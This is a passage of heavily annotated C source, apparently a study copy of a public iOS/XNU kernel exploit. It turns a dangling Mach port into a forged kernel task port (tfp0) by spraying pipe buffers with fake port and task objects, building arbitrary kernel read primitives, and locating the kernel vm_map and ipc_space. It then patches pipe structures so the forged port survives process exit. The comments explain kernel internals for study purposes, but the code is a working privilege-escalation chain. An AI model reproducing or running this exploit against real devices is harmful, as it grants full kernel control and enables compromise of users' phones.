if (err != 0) {
perror("pipe failed\n");
}
int read_end = fds[0];
int write_end = fds[1];
// The reason why we're setting the O_NONBLOCK flag is to let the write return immediately. If this were not the case, then we would have to create tons of
// threads that would block on the pipe write, but luckily, this flag does the trick.
int flags = fcntl(write_end, F_GETFL);
flags |= O_NONBLOCK;
fcntl(write_end, F_SETFL, flags);
// This will build a fake task port, with the task->kobject pointing to "pipe_target_kaddr+0x100". This is assuming that pipe_target_kaddr, which is
// canary_port page + 0x10000 will be deallocated and refilled with the pipe buffer. It boils down to the question : Will there be a
// GC ool descriptors array allocated in that region, and will it be hit within 14 iterations? If the OOL page is placed there, then the refilling will most likely succeed.
// The target read address is set to "pipe_target_kaddr" itself.
// One thing to note here is that "next_pipe_index" is being passed in to the function and set into the fake port's ipc_port->ip_context
// This will later be used to find exactly which pipe's buffer is pointing to the first dangling pointer's replaced page.
build_fake_task_port(pipe_buf, pipe_target_kaddr, pipe_target_kaddr, 0, 0, next_pipe_index);
// The write will immediately return courtesy of the O_NONBLOCK flag.
// As long as the pipe isn't closed, the kalloced memory with controlled data is live throughout the whole program.
// This is especially interesting because this means that you can have the pipe kalloc buffer stay at a fixed location, and by read/writing, you could
// constantly change data in those kalloced buffers. Perfect kernel arbitrary data loading primitive, provided there a way to find these pipe buffer addresses.
ssize_t amount_written = write(write_end, pipe_buf, 0xfff);
if (amount_written != 0xfff) {
printf("amount written was short: 0x%x\n", amount_written);
}
// Stashing away the read/write pipes to use later to set up more stronger primitives.
read_ends[next_pipe_index] = read_end;
write_ends[next_pipe_index++] = write_end;
}
dangler_hits++;
}
}
printf("replaced with pipes hopefully... take a look\n");
// check the kernel object type of the dangling port:
int otype = 0;
mach_vm_address_t oaddr = 0;
// How does mach_port_kobject() react to a fake port built above?
/*
kern_return_t
mach_port_kobject(
ipc_space_t space,
mach_port_name_t name,
natural_t *typep,
mach_vm_address_t *addrp)
{
ipc_entry_t entry;
ipc_port_t port;
kern_return_t kr;
mach_vm_address_t kaddr;
// passes
if (space == IS_NULL)
return KERN_INVALID_TASK;
// passes
kr = ipc_right_lookup_read(space, name, &entry);
if (kr != KERN_SUCCESS)
return kr;
// passes
if ((entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE) == 0) {
is_read_unlock(space);
return KERN_INVALID_RIGHT;
}
__IGNORE_WCASTALIGN(port = (ipc_port_t) entry->ie_object);
// Even if this assert was alive it passes
assert(port != IP_NULL);
ip_lock(port);
is_read_unlock(space);
// passes
if (!ip_active(port)) {
ip_unlock(port);
return KERN_INVALID_RIGHT;
}
// #define ip_kotype(port) io_kotype(&(port)->ip_object)
// #define io_kotype(io) ((io)->io_bits & IO_BITS_KOTYPE)
// It simply returns the port type of our fake port object. Since we set it up as "IKOT_TASK", that's what should be returned.
*typep = (unsigned int) ip_kotype(port);
kaddr = (mach_vm_address_t)port->ip_kobject;
ip_unlock(port);
...
return KERN_SUCCESS;
}
*/
err = mach_port_kobject(mach_task_self(), target_port, &otype, &oaddr);
if (err != KERN_SUCCESS) {
// This means that our first dangling port containing page didn't get refilled with pipes. That should be a rare case, although very possible because
// pipes themselves create internals structs used for pipe operations, and those could have filled up this dangling port page.
printf("mach_port_kobject failed: %x %s\n", err, mach_error_string(err));
}
// It should print 2(IKOT_TASK), otherwise, something is wrong.
printf("dangling port type: %x\n", otype);
uint64_t replacer_pipe_index = 0xfffffff;
// As mentioned above, the pipe index that controls the fake port's page is pegged into ipc_port->ip_context. We could easily retrieve it with "mach_port_get_context".
err = mach_port_get_context(mach_task_self(), target_port, &replacer_pipe_index);
printf("got replaced with pipe fd index %d\n", replacer_pipe_index);
printf("gonna try a read...\n");
// Let's try reading an arbitrary address. That address was actually set to "pipe_target_kaddr" in the above loop.
uint32_t val = 0;
// This is actually testing if pipe_target_kaddr(canary_port page + 0x10000) has been successfully refilled with our pipe bufs. This is because the fake
// ipc_port->receiver is set to pipe_target_kaddr, and ipc_port->receiver needs to be setup properly to make the arbitrary to work correctly.
err = pid_for_task(target_port, &val);
if (err != KERN_SUCCESS) {
printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
}
// It should print 0x80000002(IO_BITS_ACTIVE | IKOT_TASK) because that's what's stored in the fake task port's 0 offset.
// If it passed through here without a panic, then the pipe refilling technique actually worked on both target pages!
printf("read val via pid_for_task: %08x\n", val);
// at this point we know:
// * which pipe fd overlaps with the dangling port
// * the kernel address of the canary port (which is still a dangling port)
// * the kernel address of the fake task (which is a pipe buffer, but we don't know which one)
// things will be easier if we can learn the address of the dangling port giving us the address of the pipe buffer and a what/where primitive
// we could hack around that by always rewriting all the pipes each time I guess...
// for each pipe, apart from the one which we know overlaps with the port, replace the field which determines where to read from, then do the kernel read and see if the value is no longer 0x80000002
char* old_contents = malloc(0xfff);
char* new_contents = malloc(0xfff);
int pipe_target_kaddr_replacer_index = -1;
// What this loop is trying to do, is to find the pipe index for the pipe buffer that controls the "pipe_target_kaddr(canary_port page + 0x10000)" page
for (int i = 0; i < next_pipe_index; i++) {
// We don't want to mess up the fake ipc_port. Leave it alone.
if (i == replacer_pipe_index) {
continue;
}
// Read it, so write is available again
read(read_ends[i], old_contents, 0xfff);
// This time, build a fake ipc_port and set it up to read a different address(pipe_target_kaddr+4).
build_fake_task_port(new_contents, pipe_target_kaddr, pipe_target_kaddr+4, 0, 0, 0);
// Refill the buffer with the new fake port
write(write_ends[i], new_contents, 0xfff);
// try the read, did it change?
uint32_t val = 0;
// This time around it's reading from "pipe_target_kaddr+4", which corresponds to 0xf00d.
err = pid_for_task(target_port, &val);
if (err != KERN_SUCCESS) {
printf("pid_for_task returned %x (%s)\n", err, mach_error_string(err));
}
printf("read val via pid_for_task: %08x\n", val);
// If 0xf00d was read, then it means the current pipe index has actually changed the contents in the pipe_target_kaddr.
// It means the current pipe index controls the page of pipe_target_kaddr.
if (val != 0x80000002) {
printf("replacer fd index %d is at the pipe_target_kaddr\n", i);
// We found the pipe index that corresponds to "pipe_target_kaddr". Save it so we can constantly meddle with it later
pipe_target_kaddr_replacer_index = i;
break;
}
}
free(old_contents);
free(new_contents);
if (pipe_target_kaddr_replacer_index == -1) {
printf("failed to find the pipe_target_kaddr_replacer pipe\n");
}
// At this point we can create a fake ipc_port and a fake task object. We still need a couple more ingredients to construct a full-fledged kernel task port though.
// With the current ingredients at hand, we can only AAR around the memory.
// now we know which pipe fd matches up with where the fake task is so
// bootstrap the early read primitives
// Setting up some global vars so we can conveniently read DWORD/QRORD value via "early_rk{32,64}()".
prepare_early_read_primitive(target_port, read_ends[pipe_target_kaddr_replacer_index], write_ends[pipe_target_kaddr_replacer_index], pipe_target_kaddr);
// we can now use early_rk{32,64}
// send a message to the canary port containing a send right to the host port;
// use the arbitrary read to find that, and from there find the kernel task port
// The canary port is still alive so we can use it to do different things.
mach_msg_header_t host_msg = {0};
host_msg.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, MACH_MSG_TYPE_COPY_SEND);
host_msg.msgh_size = sizeof(host_msg);
host_msg.msgh_remote_port = canary_port;
host_msg.msgh_local_port = mach_host_self();
host_msg.msgh_id = 0x12344321;
// If you follow the flow of mach_msg,
// mach_msg -> ......sleh_synchronous, handle_svc, mach_syscall, etc...... -> mach_msg_overwrite_trap -> ipc_kmsg_send -> ipc_mqueue_send -> ipc_mqueue_post -> ipc_kmsg_enqueue_qos
// then you can see that the kmsgs are being queued into
// ipc_port.ip_messages.messages->ipc_kmsg
// ... I fixed this part after following Ian's suggestion. Thanks a lot Ian! :)
//
// To understand how a userspace created message is handled into the kernel, we need to see how it's actually constructed inside the kernel.
// mach_msg -> mach_msg_overwrite_trap -> ipc_kmsg_get
// ipc_kmsg_get() holds all the core logic. Let's dig into this :
/*
struct ipc_kmsg {
mach_msg_size_t ikm_size;
struct ipc_kmsg *ikm_next;
struct ipc_kmsg *ikm_prev;
mach_msg_header_t *ikm_header;
ipc_port_t ikm_prealloc;
ipc_port_t ikm_voucher;
mach_msg_priority_t ikm_qos;
mach_msg_priority_t ikm_qos_override;
struct ipc_importance_elem *ikm_importance;
queue_chain_t ikm_inheritance;
sync_qos_count_t sync_qos[THREAD_QOS_LAST];
sync_qos_count_t special_port_qos;
};
mach_msg_return_t
ipc_kmsg_get(
// Our userspace address of the message is in msg_addr
mach_vm_address_t msg_addr,
mach_msg_size_t size,
ipc_kmsg_t *kmsgp)
{
mach_msg_size_t msg_and_trailer_size;
// This object will hold a copy the userspace message into it. There will be some kind of rearrangement though, which will be explained later.
ipc_kmsg_t kmsg;
// There is also a trailer in
mach_msg_max_trailer_t *trailer;
mach_msg_legacy_base_t legacy_base;
mach_msg_size_t len_copied;
legacy_base.body.msgh_descriptor_count = 0;
...
// Let's just consider a simple case
//
/*
struct {
mach_msg_header_t hdr;
mach_msg_body_t body;
} my_msg = {0};
* /
// It contains a header & a body so it's going to fall into the else case
if(size == sizeof(mach_msg_legacy_header_t))
len_copied = sizeof(mach_msg_legacy_header_t);
else
// len_copied set to the size of the mach_msg_header + mach_msg_body
len_copied = sizeof(mach_msg_legacy_base_t);
// The header has been copied into legacy_base(which is a stack variable)
if (copyinmsg(msg_addr, (char *)&legacy_base, len_copied))
return MACH_SEND_INVALID_DATA;
...
// "msg_addr" now points to the mach_msg_body
msg_addr += sizeof(legacy_base.header);
...
// The kernel version of a mach message actually has it's own kernel message header, and something called a message trailer.
// A trailer can contain various things depending on the usage of the kernel mach message, for instnace, security tokens and the trailer type and size
// The current mach messages size(passed down as a parameter from the user called mach_msg()), is added with something called MAX_TRAILER_SIZE.
// trailers can come is various formats that differ in size. It assumes the trailer size to be the biggest of all possible trailers, and adds that to the message
msg_and_trailer_size = size + MAX_TRAILER_SIZE;
// We need to dig into this function to see how the kernel mach message is constructed
kmsg = ipc_kmsg_alloc(msg_and_trailer_size);
/*
ipc_kmsg_t
ipc_kmsg_alloc(
mach_msg_size_t msg_and_trailer_size)
{
mach_msg_size_t max_expanded_size;
ipc_kmsg_t kmsg;
mach_msg_size_t size = msg_and_trailer_size - MAX_TRAILER_SIZE;
...
// This is the case where the mach message contains OOL descriptors. The calculation here always confuses me whenever I see it, but we'll skip it
// cause we're now dealing with simple messages with only a header & body.
if (size > sizeof(mach_msg_base_t)) {
...
} else
// This is being set to "msg size + MAX_TRAILER_SIZE"
max_expanded_size = msg_and_trailer_size;
// But if the message is a simple message and less than IKM_SAVED_MSG_SIZE(256 - kmsg header size), then it's being rounded up to IKM_SAVED_MSG_SIZE
if (max_expanded_size < IKM_SAVED_MSG_SIZE)
max_expanded_size = IKM_SAVED_MSG_SIZE;
// It falls through this if case
if (max_expanded_size == IKM_SAVED_MSG_SIZE) {
struct ikm_cache *cache;
unsigned int i;
disable_preemption();
// It first searches through the per processor cache of kmsg objects to see if one is available
cache = &PROCESSOR_DATA(current_processor(), ikm_cache);
if ((i = cache->avail) > 0) {
assert(i <= IKM_STASH);
kmsg = cache->entries[--i];
cache->avail = i;
enable_preemption();
ikm_check_init(kmsg, max_expanded_size);
ikm_set_header(kmsg, msg_and_trailer_size);
return (kmsg);
}
enable_preemption();
// Let's assume it didn't find one and allocates a new chunk. It zallocs from the ipc_kmsg_zone, which is a special zone that stores cacheable ipc_kmsg
// chunks, and the size of each chunks is 0x100.
kmsg = (ipc_kmsg_t)zalloc(ipc_kmsg_zone);
} else {
kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
}
if (kmsg != IKM_NULL) {
/*
#define ikm_init(kmsg, size) \
MACRO_BEGIN \
(kmsg)->ikm_size = (size); \
(kmsg)->ikm_prealloc = IP_NULL; \
(kmsg)->ikm_voucher = IP_NULL; \
(kmsg)->ikm_importance = IIE_NULL; \
ikm_qos_init(kmsg); \
ikm_flipc_init(kmsg); \
assert((kmsg)->ikm_prev = (kmsg)->ikm_next = IKM_BOGUS); \
MACRO_END
* /
// This is basically just a macro that sets the header of the kernel mach message. It sets "(kmsg)->ikm_size" to (256 - kmsg header size)
ikm_init(kmsg, max_expanded_size);
/*
#define ikm_set_header(kmsg, mtsize) \
MACRO_BEGIN \
(kmsg)->ikm_header = (mach_msg_header_t *) \
((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END
* /
// Now this is rather wierd at first glance... What it's doing is, it's setting the pointer of the usermode mach message, to an address within the kernel
// mode mach message object. It's setting the pointer so that it could copy the entire user mode mach message into the kernel mach message object(kmsg)
// It's accounting for both the user mach message and trailer to be situated at the end of the kmsg object.
// This might be confusing now, but let's just return to "ipc_kmsg_get" for now.
ikm_set_header(kmsg, msg_and_trailer_size);
}
return(kmsg);
}
* /
// resuming here...
if (kmsg == IKM_NULL)
return MACH_SEND_NO_BUFFER;
// Remember, kmsg->ikm_header is pointing to an offset within the kmsg object, which is carefully calculated to point the user mach message(that's soon going to be copied)
// It is really confusing how the object is layed out at first, so here's a simple diagram :
// | kmsg header | some slack space | user mach_msg_header | user mach_msg_body | kmsg_trailer |
// All of the above calculation is to ensure that the object is layed out this way, and aligning the end of kmsg_trailer to the end of the kmsg object.
// Therefore, the slack space between the kmsg header and the user mach_msg_header is variable, with the other important objects shoved to each boundary edge of the kmsg object.
// A little more graphical representation can be found on the Ian Beer's Project Zero blog : https://googleprojectzero.blogspot.com/2017/04/exception-oriented-exploitation-on-ios.html
// It's copying the user mach_msg_header fields one by one into the kmsg object.
kmsg->ikm_header->msgh_size = size;
kmsg->ikm_header->msgh_bits = legacy_base.header.msgh_bits;
kmsg->ikm_header->msgh_remote_port = CAST_MACH_NAME_TO_PORT(legacy_base.header.msgh_remote_port);
kmsg->ikm_header->msgh_local_port = CAST_MACH_NAME_TO_PORT(legacy_base.header.msgh_local_port); <- This is what "0xac" means! :)
kmsg->ikm_header->msgh_voucher_port = legacy_base.header.msgh_voucher_port;
kmsg->ikm_header->msgh_id = legacy_base.header.msgh_id;
...
// Now, it's copying the mach_msg_body into the kmsg object
if (copyinmsg(msg_addr, (char *)(kmsg->ikm_header + 1), size - (mach_msg_size_t)sizeof(mach_msg_header_t))) {
ipc_kmsg_free(kmsg);
return MACH_SEND_INVALID_DATA;
}
...
...
...
// And finally, it's setting the trailers at the very end of the kmsg. Phew! Now we completely understand the wierd layout of kernel ipc objects.
trailer = (mach_msg_max_trailer_t *) ((vm_offset_t)kmsg->ikm_header + size);
trailer->msgh_sender = current_thread()->task->sec_token;
trailer->msgh_audit = current_thread()->task->audit_token;
trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;
*/
err = mach_msg(&host_msg,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
sizeof(host_msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("failed to send host message to canary port %s\n", mach_error_string(err));
//exit(EXIT_FAILURE);
}
printf("sent host_msg to canary port, let's find it and locate the host port\n");
// It's picking up "ipc_port.ip_messages.messages->messages[0]", which is the first kmsg enqued in the kernel mach message queue.
uint64_t host_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
printf("host_kmsg: %016llx\n", host_kmsg);
// hexdump the kmsg:
//for (int i = 0; i < 100; i++) {
// uint64_t val = early_rk64(host_kmsg + (i*8));
// printf("%016llx: %016llx\n", host_kmsg + (i*8), val);
//}
// It's picking up "kmsg->ikm_header->msgh_local_port", which is the host port's ipc_port object!
uint64_t host_port_kaddr = early_rk64(host_kmsg + 0xac); // could parse the message to find this rather than hardcode
// do the same thing again to get our task port:
discard_message(canary_port);
// This time it's setting the msg.msgh_local_port to the current task's port
host_msg.msgh_local_port = mach_task_self();
err = mach_msg(&host_msg,
MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
sizeof(host_msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL);
if (err != KERN_SUCCESS) {
printf("failed to send host message to canary port %s\n", mach_error_string(err));
//exit(EXIT_FAILURE);
}
printf("sent task_msg to canary port, let's find it and locate the host port\n");
uint64_t task_kmsg = early_rk64(canary_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE));
printf("task_kmsg: %016llx\n", task_kmsg);
// It's picking up "kmsg->ikm_header->msgh_local_port", which is the current task's ipc_port object
uint64_t task_port_kaddr = early_rk64(host_kmsg + 0xac);
printf("our task port is at %016llx\n", task_port_kaddr);
// now we can copy-paste some code from multi_path:
// for the full read/write primitive we need to find the kernel vm_map and the kernel ipc_space
// we can get the ipc_space easily from the host port (receiver field):
// ↑ Like Ian says, if you look at the ipc_host_init() function
/*
void ipc_host_init(void)
{
...
...
port = ipc_port_alloc_kernel();
if (port == IP_NULL)
panic("ipc_host_init");
ipc_kobject_set(port, (ipc_kobject_t) &realhost, IKOT_HOST);
kernel_set_special_port(&realhost, HOST_PORT,
ipc_port_make_send(port));
*/
// You can see how the host port is created and how it's field is set. Following the function flow as :
// ipc_port_alloc_kernel->ipc_port_alloc_special->ipc_port_init
/*
#define ipc_port_alloc_kernel() ipc_port_alloc_special(ipc_space_kernel)
void
ipc_port_init(
ipc_port_t port,
ipc_space_t space,
mach_port_name_t name)
{
port->ip_receiver = space;
port->ip_receiver_name = name;
...
...
*/
// You can find out that that the host port's receiver is being initialized with the kernel's ipc_space
uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));
printf("ipc_space_kernel: %016llx\n", ipc_space_kernel);
// the kernel vm_map is a little trickier to find
// we can use the trick from mach_portal to find the kernel task port because we know it's gonna be near the host_port on the heap:
// ↑ To understand why this works, you need to read through Ian Beer's excellent slides on mach_portal "https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c10"
// The gist of the technique is the fact that the host port gets initialized only once during system bootup, and since the host port setup is not that far from
// the kernel task port setup as seen in kernel_bootstrap() :
/*
...
...
kernel_bootstrap_log("ipc_init");
ipc_init(); <- The host port gets setup here : ipc_host_init() -> kernel_set_special_port(&realhost, HOST_PORT, ipc_port_make_send(port));
kernel_bootstrap_log("PMAP_ACTIVATE_KERNEL");
PMAP_ACTIVATE_KERNEL(master_cpu);
kernel_bootstrap_log("mapping_free_prime");
mapping_free_prime();
kernel_bootstrap_log("machine_init");
machine_init();
kernel_bootstrap_log("clock_init");
clock_init();
ledger_init();
kernel_bootstrap_log("task_init");
task_init(); <- inside here there this : "if (task_create_internal(TASK_NULL, NULL, FALSE, TRUE, TF_NONE, TPF_NONE, &kernel_task) != KERN_SUCCESS)"
...
...
*/
// So it could be assumed that the host port is very close to the kernel task port, within the same ipc_port page region
// find the start of the zone block containing the host and kernel task pointers:
// Trying to figure out which page(1st, 2nd, 3rd) the host port is lying in.
uint64_t offset = host_port_kaddr & 0xfff;
uint64_t first_port = 0;
// If it's in the first page, then the last 3 nibbles will be divisible with 0xa8. Just a reminder, the ipc_port object's size is 0xs8 bytes.
if ((offset % 0xa8) == 0) {
printf("host port is on first page\n");
first_port = host_port_kaddr & ~(0xfff);
} else if(((offset+0x1000) % 0xa8) == 0) {
// Let's say it's on the second page at offset 0x1068. Then, 0x1068 will be divisible by 0xA8.
printf("host port is on second page\n");
first_port = (host_port_kaddr-0x1000) & ~(0xfff);
} else if(((offset+0x2000) % 0xa8) == 0) {
// Same for the third page.
printf("host port is on second page\n");
first_port = (host_port_kaddr-0x2000) & ~(0xfff);
} else {
printf("hummm, my assumptions about port allocations are wrong...\n");
}
// I guess the kernel task port is always deterministically on the first page of the early boot ipc_port region.
printf("first port is at %016llx\n", first_port);
uint64_t kernel_vm_map = 0;
// Going through every ipc_port object in the first page
for (int i = 0; i < ports_per_zcram; i++) {
uint64_t early_port_kaddr = first_port + (i*0xa8);
// Reading "ipc_port->ip_object->io_bits" and checking if it's a task's ipc_port.
uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
// If not, then skip
if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
continue;
}
// get that port's kobject:
// ipc_port->ip_kobject holds the task's task object
uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
if (task_t == 0) {
printf("weird heap object with NULL kobject\n");
continue;
}
// check the pid via the bsd_info:
// Following a chain of pointers to get the process ID of the task
uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
if (bsd_info == 0) {
printf("task doesn't have a bsd info\n");
continue;
}
uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
// PID = 0 is the kernel task
if (pid != 0) {
printf("task isn't the kernel task\n");
}
// found the right task, get the vm_map
/*
struct task {
decl_lck_mtx_data(,lock)
_Atomic uint32_t ref_count;
boolean_t active;
boolean_t halting;
vm_map_t map; <- Getting this
*/
kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
break;
}
if (kernel_vm_map == 0) {
printf("unable to find the kernel task map\n");
return;
}
printf("kernel map:%016llx\n", kernel_vm_map);
// find the address of the dangling port:
// It's initiating the fixup. task->itk_space->is_table
uint64_t task_kaddr = early_rk64(task_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t itk_space = early_rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));
uint64_t is_table = early_rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));
const int sizeof_ipc_entry_t = 0x18;
// This is how it gets the index into the is_table from the port's name(refer to "through the mach portal" p.8)
// It reads the corresponding ipc_entry, and then gets ipc_entry->ie_object which is the UAFed ipc_object that's currently overlapped with the pipe buffer that holds the fake ipc_port object
uint64_t target_port_kaddr = early_rk64(is_table + ((target_port >> 8) * sizeof_ipc_entry_t));
printf("dangling port kaddr is: %016llx\n", target_port_kaddr);
// now we have everything to build a fake kernel task port for memory r/w:
// we know which
// ↑ Like he mentions, we have all ingredients to cook up a fake kernel task port.
// 1. The address of the fake ipc_object 2. The address of the fake task 3. Means to read/write arbitrary data into 1 & 2(via pipes) 4. The kernel ipc_space & vm_map
// Now let's stitch these all together to create a fake kernel task port!
int target_port_read_fd = read_ends[replacer_pipe_index];
int target_port_write_fd = write_ends[replacer_pipe_index];
uint8_t* fake_tfp0_buf = malloc(0xfff);
// Emptying the pipe. It's kind of annoying but we have to read everything before we write. Even if the pipe is nonblocking, the data won't get written until the pipe is empty.
read(target_port_read_fd, fake_tfp0_buf, 0xfff);
// This function can now fully set up the fake ipc_port along with the fake task. We don't need the bsd_info AAR anymore(it only reads a measly 8 bytes)
// so just setting it to an arbitrary value. Also, we don't need to utilize the ipc_port->ip_context anymore.
// Also, this time around it's using target_port_kaddr as ipc_port->ip_kobject, the target dangling ipc_port's address itself, as the container for the fake task object.
// As such, everything will be self-contained including the fake ipc_port & the fake task inside one page, which is the target dangling ipc_object page.
build_fake_task_port(fake_tfp0_buf, target_port_kaddr, 0x4242424243434343, kernel_vm_map, ipc_space_kernel, 0x1234);
// Apply it to the dangling target ipc_port
write(target_port_write_fd, fake_tfp0_buf, 0xfff);
// If everything works as expected, this WILL be the kernel task port.
mach_port_t fake_tfp0 = target_port;
printf("hopefully prepared a fake tfp0!\n");
// test it!
vm_offset_t data_out = 0;
mach_msg_type_number_t out_size = 0;
// If it indeed works, then mach_vm_read will successfully read 0x40 bytes from task->vm_map, which resides in kernel memory.
err = mach_vm_read(fake_tfp0, kernel_vm_map, 0x40, &data_out, &out_size);
if (err != KERN_SUCCESS) {
printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err));
sleep(3);
exit(EXIT_FAILURE);
}
// Yay! We finally made it to tfp0 without crashing the kernel. Now on to the cleaup.
printf("kernel read via second tfp0 port worked?\n");
printf("0x%016llx\n", *(uint64_t*)data_out);
printf("0x%016llx\n", *(uint64_t*)(data_out+8));
printf("0x%016llx\n", *(uint64_t*)(data_out+0x10));
printf("0x%016llx\n", *(uint64_t*)(data_out+0x18));
// Just setting some global vars
prepare_for_rw_with_fake_tfp0(fake_tfp0);
// can now use {r,w}k_{32,64}
// cleanup:
// clean up the fake canary port entry:
// Remember, the fake_canary_port's ref count is incorrectly 2. Just wipe it out completely from the task->is_table.
// It's wiping out is_table->ipc_entry->ie_object and is_table->ipc_entry->ie_bits, as well as is_table->ipc_entry->ie_index.
// It didn't take care of linking the is_table->ipc_entry->next so an entry is leaked in the is_table, but a minor issue that can be ignored.
wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t), 0);
wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t) + 8, 0);
// leak the pipe buffer which replaces the dangling port:
printf("going to try to clear up the pipes now\n");
// Now it's following a stream of pointers.
// task->bsd_info->p_fd->fd_ofiles[target_port_read_fd]->f_fglob->fg_data
// finally we have to fix up the pipe's buffer
// for this we need to find the process fd table:
// struct proc:
uint64_t proc_addr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
// struct filedesc
uint64_t filedesc = rk64(proc_addr + koffset(KSTRUCT_OFFSET_PROC_P_FD));
// base of ofiles array
uint64_t ofiles_base = rk64(filedesc + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES));
uint64_t ofiles_offset = ofiles_base + (target_port_read_fd * 8);
// struct fileproc
uint64_t fileproc = rk64(ofiles_offset);
// struct fileglob
uint64_t fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));
// struct pipe
uint64_t pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));
// clear the inline struct pipebuf
// fg_data will actually point to a pipe object as can be seen from the pipe() syscall implementation.
/*
#define f_data f_fglob->fg_data
int pipe(proc_t p, __unused struct pipe_args *uap, int32_t *retval)
{
struct pipe *rpipe, *wpipe;
..
..
..
rf->f_data = (caddr_t)rpipe;
*/
// And it's wiping out the entire pipe->pipebuf object
/*
struct pipe {
struct pipebuf pipe_buffer;
...
...
};
struct pipebuf {
u_int cnt; /* number of chars currently in buffer * /
u_int in; /* in pointer * /
u_int out; /* out pointer * /
u_int size; /* size of buffer * /
caddr_t buffer; /* kva of buffer * /
};
*/
printf("clearing pipebuf: %llx\n", pipe);
wk64(pipe + 0x00, 0);
wk64(pipe + 0x08, 0);
wk64(pipe + 0x10, 0);
// do the same for the other end:
ofiles_offset = ofiles_base + (target_port_write_fd * 8);
// struct fileproc
fileproc = rk64(ofiles_offset);
// struct fileglob
fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));
// struct pipe
pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));
printf("clearing pipebuf: %llx\n", pipe);
wk64(pipe + 0x00, 0);
wk64(pipe + 0x08, 0);
wk64(pipe + 0x10, 0);
// Why did it have to clear the internal pipe structs?
// To answer this, let's imagine what happens when this process exits. All file descriptors will be recursively closed, including the pipes that are covering
// the page containing the dangling port.
// What happens when a pipe closes?
/*
static const struct fileops pipeops = {
.fo_type = DTYPE_PIPE,
.fo_read = pipe_read,
.fo_write = pipe_write,
.fo_ioctl = pipe_ioctl,
.fo_select = pipe_select,
.fo_close = pipe_close, <- This one right here
.fo_kqfilter = pipe_kqfilter,
.fo_drain = pipe_drain,
};
static int
pipe_close(struct fileglob *fg, __unused vfs_context_t ctx)
{
struct pipe *cpipe;
proc_fdlock_spin(vfs_context_proc(ctx));
cpipe = (struct pipe *)fg->fg_data; <- remember this points to a pipe object
fg->fg_data = NULL;
proc_fdunlock(vfs_context_proc(ctx));
if (cpipe)
pipeclose(cpipe); <- our pipe object is passed down here
return (0);
}
static void
pipeclose(struct pipe *cpipe)
{
...
...
pipe_free_kmem(cpipe); <- Trying to free it...?
...
...
}
static void
pipe_free_kmem(struct pipe *cpipe)
{
if (cpipe->pipe_buffer.buffer != NULL) {
OSAddAtomic(-(cpipe->pipe_buffer.size), &amountpipekva);
OSAddAtomic(-1, &amountpipes);
kfree((void *)cpipe->pipe_buffer.buffer, cpipe->pipe_buffer.size); <- THIS RIGHT HERE.
cpipe->pipe_buffer.buffer = NULL;
cpipe->pipe_buffer.size = 0;
}
}
*/
// Aha! So now we understand why it was doing all that stuff. It's trying to intentionally leak the memory by wiping out all those members.
// It's specifically leaking the page that contains the fake kernel task port.
// kfree() will simply do nothing when provided NULL arguments.
// We're doing this because we don't want this critical chunk of memory to be deallocated when the pipes are closed or the process exits.
// I think if you skip this step, then the kernel will panic as soon as the process exits, or the pipes are closed.
printf("done!\n");
printf("use the functions in kmem.h to read and write kernel memory\n");
printf("tfp0 in there will stay alive once this process exits\n");
printf("keep hold of a send right to it; don't expect this exploit to work again without a reboot\n");
}